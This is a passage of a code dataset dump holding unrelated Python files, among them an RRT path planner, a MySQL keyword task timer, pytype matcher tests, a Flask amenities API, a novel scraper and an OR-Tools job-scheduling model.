'aqua')\n goal_n = plt.Circle((goal[0],goal[1]),goal[2], color = 'green')\n ax.add_artist(start_n)\n ax.add_artist(goal_n)\n\n plot_goals = []\n for l in range(len(obstacles)):\n plot_obstacles=plt.Circle((obstacles[l][0],obstacles[l][1]),18,color='red')\n ax.add_artist(plot_obstacles) \n for k in range(len(goals)):\n plot_goals = plt.Circle((goals[k][0], goals[k][1]), 2, color='black')\n ax.add_artist(plot_goals)\n figure, plt.ion()\n return figure\n\n \ndef get_theta_node(new_node, parent):\n theta = atan2(new_node.y-parent.y,new_node.x-parent.x)\n #print('theta is{}'.format(theta))\n return Node(parent.x + EPSILON*cos(theta), parent.y + EPSILON*sin(theta))\n\ndef mapping(OldMax, OldMin, NewMax, NewMin, OldValue):\n OldRange = (OldMax - OldMin) \n NewRange = (NewMax - NewMin) \n NewValue = (((OldValue - OldMin) * NewRange) / OldRange) + NewMin\n return NewValue\n\n\ndef RRT(tic):\n ##Define Initial Parameters\n goal = get_goal(tic)\n figure = setup_space(goal)\n start_node = Node(START_X,START_Y)\n goal_node = Node(goal[0],goal[1])\n current_node = start_node\n figure, plt.plot([0,100], [33, 33], color = 'black', linewidth = 3)\n figure, plt.plot([0,100], [66, 66], color = 'black', linewidth = 3)\n figure, plt.plot([33,33], [0, 100], color = 'black', linewidth = 3)\n figure, plt.plot([66,66], [0, 100], color = 'black', linewidth = 3)\n # print('Distance to goal is {}'.format(current_node.distance_to(goal_node)))\n nodes = []\n nodes2 = []\n final_list = []\n nodes.append(start_node)\n nodes2.append(start_node)\n\n ##Setup plots\n\n #main loop\n while current_node.distance_to(goal_node) > goal[2]: \n neighbors = []\n new_node = Node(random()*WIDTH, random()*LENGTH)\n #print(new_node)\n closest_node = new_node.closest2(nodes)\n # print('distance to parent is {}'.format(new_node.distance_to(parent)))\n if new_node.distance_to(closest_node) > EPSILON:\n #print('Too Long')\n new_node = get_theta_node(new_node,closest_node)\n #print('new distance to parent is {}'.format(new_node.distance_to(parent)))\n new_node2 = new_node\n for node in nodes:\n if node.distance_to(new_node) < neighborhood:\n neighbors.append(node)\n collision_flag=0\n collision_flag=collision(new_node,obstacles)\n if(collision_flag==1):\n continue\n \n best_parent = new_node.optimal(neighbors)\n\n\n if new_node.distance_to(best_parent) > EPSILON:\n #print('Too Long')\n new_node = get_theta_node(new_node,best_parent)\n\n figure, plt.plot([new_node.x, best_parent.x], [new_node.y, best_parent.y], color = 'blue',linewidth = 1.5)\n #figure, plt.plot([new_node2.x, closest_node.x], [new_node2.y, closest_node.y], color = 'magenta',linewidth = 1, alpha = .9)\n plt.pause(0.0001)\n \n \n current_node = Node(new_node.x, new_node.y, parent = best_parent)\n current_node2 = Node(new_node2.x, new_node2.y, parent = closest_node)\n nodes.append(current_node)\n nodes2.append(current_node2)\n super_flag = False\n for node in neighbors:\n if node.parent != None:\n if node.cost_to_start() >= current_node.self_cost_to_start_through_node(node):\n index = nodes.index(node)\n figure, plt.plot([node.x, node.parent.x], [node.y, node.parent.y], color = 'white',linewidth = 1.51)\n nodes[index] = Node(node.x,node.y, parent = current_node)\n figure, plt.plot([new_node.x, node.x], [new_node.y, node.y], color = 'blue',linewidth = 1.5)\n half_way1=((new_node.x+node.x)/2,(new_node.y+node.y)/2)\n goal_check1=sqrt(pow(half_way1[0]-goal[0],2)+pow(half_way1[1]-goal[1],2))\n if goal_check1datetime.datetime.now():\n r_y=False\n break\n if all_y:\n continue\n if reset_r and r_y:\n #----\n try:\n if refresh:\n requests.get(refresh)\n print(\"--------------------------refresh success!------------------------\")\n except Exception as e:\n print(e)\n fin_time = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n sql = \"update website set time=%s where rooturl=%s\"\n cursor.execute(sql, (fin_time, rooturl))\n con.commit()\n #----\n sql= \"update tasktimer set resetkeyword_done=1 where rooturl=%s\"\n cursor.execute(sql,rooturl)\n con.commit()\n sql = \"update tasktimer set success_done=0 where rooturl=%s\"\n cursor.execute(sql, rooturl)\n con.commit()\n sql = \"select name,id from website where rooturl=%s\"\n cursor.execute(sql, rooturl)\n reweb_result = cursor.fetchone()\n print(reweb_result)\n w_name = reweb_result[0]\n sql = \"select bz_keywords from resetkeyword where name=%s\"\n cursor.execute(sql, w_name)\n reset_result = cursor.fetchall()\n # print(reset_result)\n # new_r_list = reset_result[0][0].split(\",\")\n new_r_list = re.split(\",|,\",reset_result[0][0])\n print(new_r_list)\n # reset_list = (s for s in new_r_list)\n sql = \"select tobekeyword,id from category where websiteid=%s and tobekeyword is not null \"\n cursor.execute(sql, websiteid)\n to_result = cursor.fetchall()\n print(to_result)\n ins_k_list=[]\n for in_tk in to_result:\n sql = \"update category set tobekeyword=%s where id=%s\"\n ins_k = random.choice(new_r_list)\n if ins_k_list:\n ins_num = 1\n while ins_num:\n ins_num+=1\n if ins_num >20:\n break\n if ins_k not in ins_k_list:\n ins_num=0\n break\n ins_k = random.choice(new_r_list)\n cursor.execute(sql,(ins_k,in_tk[1]))\n con.commit()\n ins_k_list.append(ins_k)\n\nif __name__ == '__main__':\n tas_list = []\n with open(\"tasktimer.txt\", \"r\", encoding='utf8') as f:\n task_l = f.readlines()\n for i in task_l:\n new_f = i.split(\":\")\n if len(new_f)==2:\n tas_list.append(new_f[1].strip())\n # print(tas_list)\n one_host = tas_list[0]\n one_port = int(tas_list[1])\n one_user = tas_list[2]\n one_pwd = tas_list[3]\n one_db = tas_list[4]\n tow_host = tas_list[5]\n tow_port = int(tas_list[6])\n tow_user = tas_list[7]\n tow_pwd = tas_list[8]\n tow_db = tas_list[9]\n\n while True:\n t_list=FaBu(one_host,one_port,one_user,one_pwd,one_db)\n # print(t_list)\n if t_list:\n new_t_list=[]\n for i in range(len(t_list)):\n new_t_list.append(t_list[i:i+1])\n # print(new_t_list)\n lock = Lock()\n l=[]\n for n in new_t_list:\n p=Process(target=FaSuccess,args=(lock,n,one_host,one_port,one_user,one_pwd,one_db,tow_host,tow_port,tow_user,tow_pwd,tow_db))\n l.append(p)\n p.start()\n for i in l:\n i.join()\n\n\n\n","sub_path":"tasktimer.py","file_name":"tasktimer.py","file_ext":"py","file_size_in_byte":16571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488685392","text":"#!/usr/bin/python3\n\nimport sys\nimport runner\n\nfrom linux import system\n\nmodule = sys.modules[__name__]\nmodule.name = 'system'\n\nclass suspend(runner.Test):\n def __call__(self, log, *args, **kwargs):\n rtc = system.RTC('rtc0')\n rtc.set_alarm_relative(5)\n\n sys = system.System()\n sys.suspend()\n\n'''\nNote that this is merely an API test, because when this test finishes running,\nthe watchdog object will be deleted, which in turn will disable the watchdog.\nThe reason for this is that the watchdog will reboot the system if successful,\nat which point we have no way of determining whether or not it actually\nworked from this test suite.\n'''\nclass watchdog(runner.Test):\n def __call__(self, log, *args, **kwargs):\n watchdog = system.Watchdog('/dev/watchdog')\n watchdog.set_timeout(30)\n watchdog.enable()\n\nif __name__ == '__main__':\n runner.standalone(module)\n","sub_path":"tests/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"208281889","text":"# coding: utf8\nfrom __future__ import unicode_literals\n\nfrom spacy.lang.en import English\nfrom spacy.tokens import Doc\nfrom spacy.pipeline import EntityRuler, EntityRecognizer\n\n\ndef test_issue3345():\n \"\"\"Test case where preset entity crosses sentence boundary.\"\"\"\n nlp = English()\n doc = Doc(nlp.vocab, words=[\"I\", \"live\", \"in\", \"New\", \"York\"])\n doc[4].is_sent_start = True\n ruler = EntityRuler(nlp, patterns=[{\"label\": \"GPE\", \"pattern\": \"New York\"}])\n ner = EntityRecognizer(doc.vocab)\n # Add the OUT action. I wouldn't have thought this would be necessary...\n ner.moves.add_action(5, \"\")\n ner.add_label(\"GPE\")\n doc = ruler(doc)\n # Get into the state just before \"New\"\n state = ner.moves.init_batch([doc])[0]\n ner.moves.apply_transition(state, \"O\")\n ner.moves.apply_transition(state, \"O\")\n ner.moves.apply_transition(state, \"O\")\n # Check that B-GPE is valid.\n assert ner.moves.is_valid(state, \"B-GPE\")\n","sub_path":"spacy/tests/regression/test_issue3345.py","file_name":"test_issue3345.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196697691","text":"import os\n\nfrom app import config\nimport app.libraries.pyganim as pyganim\nfrom app.asset_manager import load_and_scale\nfrom app.db import db\nfrom app.libraries.euclid import Point3, Vector3, proj, tile_distance, trunc\nfrom app.game import dirs2, dirs3, get_direction, butts2\n\n\nclass Entity:\n def __init__(self, **kwargs):\n self.type = None\n self.world = None\n\n # Physics\n self.position3 = Point3(0, 0, 0)\n self.velocity3 = Vector3(0, 0, 0)\n\n # Movement\n self.path = []\n self.path_origin = None\n self.final_move_dest = None\n self.facing = \"down\"\n self.move_rate = config.walk_rate\n\n if \"slug\" in kwargs:\n self.slug = kwargs[\"slug\"]\n if \"position\" in kwargs:\n self.set_position(kwargs[\"position\"])\n\n @property\n def tile_pos(self):\n return proj(self.position3)\n\n @property\n def world_pos(self):\n return proj(self.path[-1]) if self.moving and self.path else proj(self.tile_pos)\n\n # Physics\n def update_physics(self, td):\n self.position3 += self.velocity3 * td\n\n def set_position(self, pos):\n self.position3.x = pos[0]\n self.position3.y = pos[1]\n\n def stop_moving(self):\n self.velocity3.x = 0\n self.velocity3.y = 0\n self.velocity3.z = 0\n\n @property\n def moving(self):\n return not self.velocity3 == (0, 0, 0)\n\n def move(self, dt):\n self.update_physics(dt)\n if self.path:\n if self.path_origin:\n self.check_waypoint()\n else:\n # if path origin is not set, then a previous attempt to change\n # waypoints failed, so try again.\n self.next_waypoint()\n\n if not self.path:\n self.cancel_movement()\n\n def move_one_tile(self, direction):\n pos = self.path[0] if self.path else self.world_pos\n self.path.insert(0, trunc(pos + butts2[direction]))\n\n def next_waypoint(self):\n target = self.path[-1]\n direction = get_direction(self.tile_pos, target) if self.tile_pos != target else self.facing\n self.facing = direction\n if self.world.valid_move(self, target):\n self.path_origin = tuple(self.tile_pos)\n self.velocity3 = self.move_rate * dirs3[direction]\n else:\n # the target is blocked now\n self.stop_moving()\n self.path = []\n\n def check_waypoint(self):\n \"\"\" Check if the waypoint is reached and sets new waypoint if so.\n :return: None\n \"\"\"\n target = self.path[-1]\n expected = tile_distance(self.path_origin, target)\n traveled = tile_distance(self.tile_pos, self.path_origin)\n if traveled >= expected:\n self.set_position(target)\n self.path.pop()\n\n #self.world.end_move_out(self, self.path_origin)\n #self.world.end_move_into(self, target)\n\n self.path_origin = None\n if self.path:\n self.next_waypoint()\n\n def cancel_movement(self):\n \"\"\" Gracefully stop moving. May cause issues with world triggers.\n :return:\n \"\"\"\n if self.tile_pos == self.path_origin:\n self.abort_movement()\n elif self.path and self.moving:\n self.path = [self.path[-1]]\n else:\n self.stop_moving()\n self.cancel_path()\n\n def abort_movement(self):\n \"\"\" Stop moving, cancel paths, and reset tile position to center. May cause issues with world triggers.\n :return:\n \"\"\"\n if self.path_origin is not None:\n self.set_position(self.path_origin)\n self.stop_moving()\n self.cancel_path()\n\n def cancel_path(self):\n self.path = []\n self.path_origin = None\n\n\nclass Movable:\n wants_to_move = None\n wants_to_move_direction = None\n can_move = False\n\n\nclass UpdateInterface:\n def update(self, dt):\n pass\n\n\nclass EventInterface:\n def event(self, event):\n pass\n\n\nclass DrawInterface:\n def get_sprites(self, layer):\n state = self.get_sprite_state()\n frame = self.sprite[state]\n if isinstance(frame, pyganim.PygAnimation):\n surface = frame.getCurrentFrame()\n frame.rate = self.get_play_rate(state)\n return [(surface, self.get_tile_pos(), layer)]\n return [(frame, self.get_tile_pos(), layer)]\n\n def load_sprites(self, sprite_name=None):\n \"\"\" Load sprite graphics\n\n :return:\n \"\"\"\n self.sprite = {}\n self.moveConductor = pyganim.PygConductor()\n\n sprite_name = sprite_name if sprite_name else self.get_sprite_name()\n data = db.lookup(sprite_name, table=\"sprite_data\")\n for key, value in data[\"sprites\"].items():\n file = value['file']\n if value[\"animation\"]:\n num_frames = value['frames']\n frame_duration = value['frame_duration']\n files = [\"{}.{}.png\".format(file, str(i).rjust(3, '0')) for i in range(num_frames)]\n paths = [os.path.join(\"sprites\", file) for file in files]\n frames = [(load_and_scale(path), frame_duration) for path in paths]\n self.sprite[key] = pyganim.PygAnimation(frames, loop=True)\n self.moveConductor.add(self.sprite[key])\n\n else:\n path = os.path.join(\"sprites\", file + \".png\")\n self.sprite[key] = load_and_scale(path)\n\n self.moveConductor.play()\n\n def get_play_rate(self, state):\n return 1.0\n\n def get_sprite_state(self):\n raise NotImplementedError\n\n def get_tile_pos(self):\n raise NotImplementedError\n\n def get_sprite_name(self):\n raise NotImplementedError\n\nclass WallInterface:\n def valid_move(self, entity):\n raise NotImplementedError\n\n\nclass TileCollisionInterface:\n def start_move_into(self, entity):\n raise NotImplementedError\n\n def end_move_into(self, entity):\n raise NotImplementedError\n\n def start_move_out(self, entity):\n raise NotImplementedError\n\n def end_move_out(self, entity):\n raise NotImplementedError\n","sub_path":"app/win/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407764131","text":"# -*- coding:UTF-8 -*-\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport pymongo\n\nif __name__ == \"__main__\":\n download_url = 'http://www.biqukan.com/1_1094/5403177.html'\n head = {}\n head['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'\n download_req = request.Request(url = download_url, headers = head)\n download_response = request.urlopen(download_req)\n download_html = download_response.read().decode('gbk','ignore')\n soup_texts = BeautifulSoup(download_html, 'html.parser')\n texts = soup_texts.find_all(id = 'content', class_ = 'showtxt')\n soup_text = BeautifulSoup(str(texts), 'html.parser')\n\n content = soup_text.div.text.replace('\\xa0','')\n data = {\n 'content': content\n }\n client = pymongo.MongoClient('localhost', 27017)\n database = client['小说']\n table =database['玄幻']\n table.insert(data)","sub_path":"get-storys.py","file_name":"get-storys.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"379110581","text":"\"\"\"Tests for matcher.py.\"\"\"\n\n\nfrom pytype import abstract\nfrom pytype import config\nfrom pytype import errors\nfrom pytype import utils\nfrom pytype import vm\n\nimport unittest\n\n\nclass MatcherTest(unittest.TestCase):\n \"\"\"Test matcher.AbstractMatcher.\"\"\"\n\n def setUp(self):\n self.vm = vm.VirtualMachine(errors.ErrorLog(), config.Options([\"\"]))\n self.type_type = abstract.get_atomic_value(self.vm.convert.type_type)\n\n def _make_class(self, name):\n return abstract.InterpreterClass(name, [], {}, None, self.vm)\n\n def _parse_and_lookup(self, src, objname, filename=None):\n if filename is None:\n filename = str(hash(src))\n with utils.Tempdir() as d:\n d.create_file(filename + \".pyi\", src)\n self.vm.options.tweak(pythonpath=[d.path])\n ast = self.vm.loader.import_name(filename)\n return ast.Lookup(filename + \".\" + objname)\n\n def _convert(self, t, as_instance):\n \"\"\"Convenience function for turning a string into an abstract value.\n\n Note that this function cannot be called more than once per test with\n the same arguments, since we hash the arguments to get a filename for\n the temporary pyi.\n\n Args:\n t: The string representation of a type.\n as_instance: Whether to convert as an instance.\n\n Returns:\n An AtomicAbstractValue.\n \"\"\"\n src = \"from typing import Tuple, Type\\n\"\n src += \"x = ... # type: \" + t\n filename = str(hash((t, as_instance)))\n x = self._parse_and_lookup(src, \"x\", filename).type\n if as_instance:\n x = abstract.AsInstance(x)\n return self.vm.convert.constant_to_value(\"\", x, {}, self.vm.root_cfg_node)\n\n def _match_var(self, left, right):\n var = self.vm.program.NewVariable()\n var.AddBinding(left, [], self.vm.root_cfg_node)\n for view in abstract.get_views([var], self.vm.root_cfg_node):\n yield self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, view)\n\n def assertMatch(self, left, right):\n for match in self._match_var(left, right):\n self.assertEquals(match, {})\n\n def assertNoMatch(self, left, right):\n for match in self._match_var(left, right):\n self.assertIsNone(match)\n\n def testBasic(self):\n self.assertMatch(abstract.Empty(self.vm), abstract.Nothing(self.vm))\n\n def testType(self):\n left = self._make_class(\"dummy\")\n type_parameters = {abstract.T: abstract.TypeParameter(abstract.T, self.vm)}\n other_type = abstract.ParameterizedClass(\n self.type_type, type_parameters, self.vm)\n for result in self._match_var(left, other_type):\n instance_binding, = result[abstract.T].bindings\n cls_binding, = instance_binding.data.cls.bindings\n self.assertEquals(cls_binding.data, left)\n\n def testUnion(self):\n left_option1 = self._make_class(\"o1\")\n left_option2 = self._make_class(\"o2\")\n left = abstract.Union([left_option1, left_option2], self.vm)\n self.assertMatch(left, self.type_type)\n\n def testMetaclass(self):\n left = self._make_class(\"left\")\n meta1 = self._make_class(\"m1\")\n meta2 = self._make_class(\"m2\")\n left.cls = self.vm.program.NewVariable(\n [meta1, meta2], [], self.vm.root_cfg_node)\n self.assertMatch(left, meta1)\n self.assertMatch(left, meta2)\n\n def testEmptyAgainstClass(self):\n var = self.vm.program.NewVariable()\n right = self._make_class(\"bar\")\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertEquals(result, {})\n\n def testEmptyAgainstNothing(self):\n var = self.vm.program.NewVariable()\n right = abstract.Nothing(self.vm)\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertEquals(result, {})\n\n def testEmptyAgainstTypeParameter(self):\n var = self.vm.program.NewVariable()\n right = abstract.TypeParameter(\"T\", self.vm)\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertItemsEqual(result, [\"T\"])\n self.assertFalse(result[\"T\"].bindings)\n\n def testEmptyAgainstUnsolvable(self):\n var = self.vm.program.NewVariable()\n right = abstract.Empty(self.vm)\n result = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertEquals(result, {})\n\n def testClassAgainstTypeUnion(self):\n left = self._make_class(\"foo\")\n union = abstract.Union((left,), self.vm)\n right = abstract.ParameterizedClass(self.type_type, {\"T\": union}, self.vm)\n self.assertMatch(left, right)\n\n def testNoneAgainstBool(self):\n # See pep484.COMPAT_MAP.\n left = self._convert(\"None\", as_instance=True)\n right = self._convert(\"bool\", as_instance=False)\n self.assertMatch(left, right)\n\n def testHomogeneousTuple(self):\n left = self._convert(\"Tuple[int, ...]\", as_instance=True)\n right1 = self._convert(\"Tuple[int, ...]\", as_instance=False)\n right2 = self._convert(\"Tuple[str, ...]\", as_instance=False)\n self.assertMatch(left, right1)\n self.assertNoMatch(left, right2)\n\n def testHeterogeneousTuple(self):\n left1 = self._convert(\"Tuple[int or str]\", as_instance=True)\n left2 = self._convert(\"Tuple[int, str]\", as_instance=True)\n left3 = self._convert(\"Tuple[str, int]\", as_instance=True)\n right = self._convert(\"Tuple[int, str]\", as_instance=False)\n self.assertNoMatch(left1, right)\n self.assertMatch(left2, right)\n self.assertNoMatch(left3, right)\n\n def testHeterogeneousTupleAgainstHomogeneousTuple(self):\n left = self._convert(\"Tuple[bool, int]\", as_instance=True)\n right1 = self._convert(\"Tuple[bool, ...]\", as_instance=False)\n right2 = self._convert(\"Tuple[int, ...]\", as_instance=False)\n right3 = self._convert(\"tuple\", as_instance=False)\n self.assertNoMatch(left, right1)\n self.assertMatch(left, right2)\n self.assertMatch(left, right3)\n\n def testHomogeneousTupleAgainstHeterogeneousTuple(self):\n left1 = self._convert(\"Tuple[bool, ...]\", as_instance=True)\n left2 = self._convert(\"Tuple[int, ...]\", as_instance=True)\n left3 = self._convert(\"tuple\", as_instance=True)\n right = self._convert(\"Tuple[bool, int]\", as_instance=False)\n self.assertMatch(left1, right)\n self.assertNoMatch(left2, right)\n self.assertMatch(left3, right)\n\n def testTupleType(self):\n # homogeneous against homogeneous\n left = self._convert(\"Type[Tuple[float, ...]]\", as_instance=True)\n right1 = self._convert(\"Type[Tuple[float, ...]]\", as_instance=False)\n right2 = self._convert(\"Type[Tuple[str, ...]]\", as_instance=False)\n self.assertMatch(left, right1)\n self.assertNoMatch(left, right2)\n\n # heterogeneous against heterogeneous\n left1 = self._convert(\"Type[Tuple[int or str]]\", as_instance=True)\n left2 = self._convert(\"Type[Tuple[int, str]]\", as_instance=True)\n left3 = self._convert(\"Type[Tuple[str, int]]\", as_instance=True)\n right = self._convert(\"Type[Tuple[int, str]]\", as_instance=False)\n self.assertNoMatch(left1, right)\n self.assertMatch(left2, right)\n self.assertNoMatch(left3, right)\n\n # heterogeneous against homogeneous\n left = self._convert(\"Type[Tuple[bool, int]]\", as_instance=True)\n right1 = self._convert(\"Type[Tuple[bool, ...]]\", as_instance=False)\n right2 = self._convert(\"Type[Tuple[int, ...]]\", as_instance=False)\n right3 = self._convert(\"Type[tuple]\", as_instance=False)\n self.assertNoMatch(left, right1)\n self.assertMatch(left, right2)\n self.assertMatch(left, right3)\n\n # homogeneous against heterogeneous\n left1 = self._convert(\"Type[Tuple[bool, ...]]\", as_instance=True)\n left2 = self._convert(\"Type[Tuple[int, ...]]\", as_instance=True)\n left3 = self._convert(\"Type[tuple]\", as_instance=True)\n right = self._convert(\"Type[Tuple[bool, int]]\", as_instance=False)\n self.assertMatch(left1, right)\n self.assertNoMatch(left2, right)\n self.assertMatch(left3, right)\n\n def testTupleSubclass(self):\n subclass = self._parse_and_lookup(\"\"\"\n from typing import Tuple\n class A(Tuple[bool, int]): ...\"\"\", \"A\")\n left = self.vm.convert.constant_to_value(\n \"\", abstract.AsInstance(subclass), {}, self.vm.root_cfg_node)\n right1 = self._convert(\"Tuple[bool, int]\", as_instance=False)\n right2 = self._convert(\"Tuple[int, bool]\", as_instance=False)\n right3 = self._convert(\"Tuple[int, int]\", as_instance=False)\n right4 = self._convert(\"Tuple[int]\", as_instance=False)\n right5 = self._convert(\"tuple\", as_instance=False)\n right6 = self._convert(\"Tuple[bool, ...]\", as_instance=False)\n right7 = self._convert(\"Tuple[int, ...]\", as_instance=False)\n self.assertMatch(left, right1)\n self.assertNoMatch(left, right2)\n self.assertMatch(left, right3)\n self.assertNoMatch(left, right4)\n self.assertMatch(left, right5)\n self.assertNoMatch(left, right6)\n self.assertMatch(left, right7)\n\n def testAnnotationClass(self):\n left = abstract.AnnotationClass(\"Dict\", self.vm)\n right = self.vm.convert.object_type.data[0]\n self.assertMatch(left, right)\n\n def testEmptyTupleClass(self):\n var = self.vm.program.NewVariable()\n params = {0: abstract.TypeParameter(abstract.K, self.vm),\n 1: abstract.TypeParameter(abstract.V, self.vm)}\n params[abstract.T] = abstract.Union((params[0], params[1]), self.vm)\n right = abstract.TupleClass(\n self.vm.convert.tuple_type.data[0], params, self.vm)\n match = self.vm.matcher.match_var_against_type(\n var, right, {}, self.vm.root_cfg_node, {})\n self.assertSetEqual(set(match), {abstract.K, abstract.V})\n\n def testUnsolvableAgainstTupleClass(self):\n left = self.vm.convert.unsolvable\n params = {0: abstract.TypeParameter(abstract.K, self.vm),\n 1: abstract.TypeParameter(abstract.V, self.vm)}\n params[abstract.T] = abstract.Union((params[0], params[1]), self.vm)\n right = abstract.TupleClass(\n self.vm.convert.tuple_type.data[0], params, self.vm)\n for match in self._match_var(left, right):\n self.assertSetEqual(set(match), {abstract.K, abstract.V})\n self.assertEquals(match[abstract.K].data, [self.vm.convert.unsolvable])\n self.assertEquals(match[abstract.V].data, [self.vm.convert.unsolvable])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pytype/matcher_test.py","file_name":"matcher_test.py","file_ext":"py","file_size_in_byte":10228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"292840672","text":"#!/usr/bin/python3\n\"\"\"DUMMY DOX\"\"\"\nfrom flask import jsonify, request, abort\nfrom api.v1.views import app_views\n\n\n@app_views.route('/amenities/', methods=['GET', 'DELETE', 'PUT'],\n strict_slashes=False)\n@app_views.route('/amenities', methods=['GET', 'POST'], strict_slashes=False)\ndef manipulate_amenity(amenity_id=None):\n '''Retrieves, deletes, creates, and updates an Amenity object'''\n from models import storage\n from models.amenity import Amenity\n method = request.method\n if method == 'GET':\n if amenity_id is None:\n amenities = storage.all(Amenity).values()\n return jsonify([amenity.to_dict() for amenity in amenities])\n elif storage.get(Amenity, amenity_id) is None:\n abort(404)\n else:\n return jsonify(storage.get(Amenity, amenity_id).to_dict())\n elif method == 'DELETE':\n if amenity_id is None or storage.get(Amenity, amenity_id) is None:\n abort(404)\n else:\n storage.delete(storage.get(Amenity, amenity_id))\n storage.save()\n return jsonify({})\n elif method == 'POST':\n if request.is_json:\n jsn = request.get_json()\n if 'name' in jsn.keys():\n amenity = Amenity(**jsn)\n amenity.save()\n return jsonify(amenity.to_dict()), 201\n else:\n abort(400, 'Missing name')\n else:\n abort(400, 'Not a JSON')\n elif method == 'PUT':\n amenity = storage.get(Amenity, amenity_id)\n if amenity_id is None or amenity is None:\n abort(404)\n if request.is_json:\n jsn = request.get_json()\n for key, val in jsn.items():\n if key not in [\"id\", \"created_at\", \"updated_at\"]:\n setattr(amenity, key, val)\n amenity.save()\n return jsonify(amenity.to_dict())\n else:\n abort(400, 'Not a JSON')\n","sub_path":"api/v1/views/amenities.py","file_name":"amenities.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"142949157","text":"from ortools.constraint_solver import pywrapcp\nfrom pathlib import Path\n\n\nclass RPQ( ) :\n def __init__ (self,r,p,q):\n self.R = r\n self.P = p\n self.Q = q\n\n\ndef cpApp( jobs , instanceName ):\n\n variablesMaxValue = 0\n for i in range (len(jobs)):\n variablesMaxValue += (jobs[ i ].R+jobs[ i ].P+jobs[ i ].Q)\n parameters = pywrapcp.Solver.DefaultSolverParameters()\n solver = pywrapcp.Solver('simple_CP', parameters)\n #variables:\n alfasMatrix = { } # a t ten t ion ! d ic t iona ry − not l i s t !\n for i in range ( len( jobs ) ) :\n for j in range ( len ( jobs ) ) :\n alfasMatrix[ i , j ] = solver.IntVar( 0 , 1 , \" alfa \"+str( i )+ \"_\"+str( j ) )\n starts = [ ]\n for i in range ( len ( jobs ) ) :\n starts.append( solver.IntVar ( 0 , variablesMaxValue , \" s t a r t s \"+ str( i ) ) )\n cmax = solver.IntVar ( 0 , variablesMaxValue , \"cmax\" )\n# c on s t r a in t s :\n for i in range ( len ( jobs ) ) :\n solver.Add( starts[ i ]>=jobs[ i ] . R)\n solver.Add(cmax>= starts[ i ] + jobs [ i ].P+jobs [ i ] .Q)\n for i in range ( len ( jobs ) ) :\n for j in range ( i +1 ,len ( jobs ) ) :\n solver.Add( starts[ i ]+ jobs [ i ].P <= starts[ j ] + alfasMatrix [ i , j ] * variablesMaxValue )\n solver.Add( starts [ j ]+ jobs [ j ].P <= starts [ i ] + alfasMatrix [ j , i ] * variablesMaxValue )\n solver.Add( alfasMatrix [ i , j ] + alfasMatrix [ j , i ] == 1 )\n\n# s o l v e r :\n objective = solver.Minimize(cmax, 1)\n decision_builder = solver.Phase([cmax],\n solver.CHOOSE_FIRST_UNBOUND,\n solver.ASSIGN_MIN_VALUE)\n collector = solver.LastSolutionCollector()\n \"\"\"#1\n Próba\n \"\"\"#1\n # Add the decision variables.\n for i in starts:\n collector.Add(i)\n #collector.Add(cmax)\n \"\"\"#2\n for i in range ( len ( jobs ) ) :\n for j in range ( i +1 ,len ( jobs ) ) :\n collector.Add( starts[ i ]+ jobs [ i ].P <= starts[ j ] + alfasMatrix [ i , j ] * variablesMaxValue )\n collector.Add( starts [ j ]+ jobs [ j ].P <= starts [ i ] + alfasMatrix [ j , i ] * variablesMaxValue )\n collector.Add( alfasMatrix [ i , j ] + alfasMatrix [ j , i ] == 1 )\n \"\"\" #2\n\n collector.AddObjective(cmax)\n solver.Solve(decision_builder, [objective, collector])\n if collector.SolutionCount() > 0:\n best_solution = collector.SolutionCount() - 1\n \"\"\"#2\n collector.ObjectiveValue(best_solution) jest git\n \"\"\"#2\n print(instanceName , \"Cmax: \", collector.ObjectiveValue(best_solution))\n \"\"\"\n pi = [ ]\n for i in range ( len ( starts) ):\n pi.append ( collector.Value(best_solution, starts[i]) )\n #pi.sort ( key=lambda x : x [ 1 ] )\n \"\"\"\n\n pi = []\n for i in range ( len ( starts) ):\n pi.append ( ( i , collector.Value(best_solution, starts[i]) ) )\n pi.sort ( key=lambda x : x [ 1 ] )\n print(pi)\n #pi.sort ( key=lambda x : x [ 1 ] )\n #collector.Value(best_solution, starts[i])\n #print(collector)\n\n\n\n\n ########## ########## ########## ########## ########## ########## ########## ########## ########## ##########\ndef GetRPQsFromFile ( pathToFile ):\n fullTextFromFile = Path (pathToFile).read_text ( )\n words = fullTextFromFile.replace ( \"\\n\" , \" \" ).split ( \" \" )\n words_cleaned = list ( filter (None, words ) )\n numbers = list (map( int , words_cleaned ) )\n numberOfJobs = numbers [ 0 ]\n numbers.pop ( 0 )\n numbers.pop ( 0 )\n jobs = [ ]\n\n for i in range ( numberOfJobs ) :\n jobs.append (RPQ(numbers [ 0 ] , numbers [ 1 ] , numbers [ 2 ] ) )\n numbers.pop ( 0 )\n numbers.pop ( 0 )\n numbers.pop ( 0 )\n return jobs\n\n\nif __name__ == '__main__' :\n file_paths = [ \"in50.txt \" ]\n for i in range ( len ( file_paths ) ) :\n jobs = GetRPQsFromFile(file_paths[ i ] 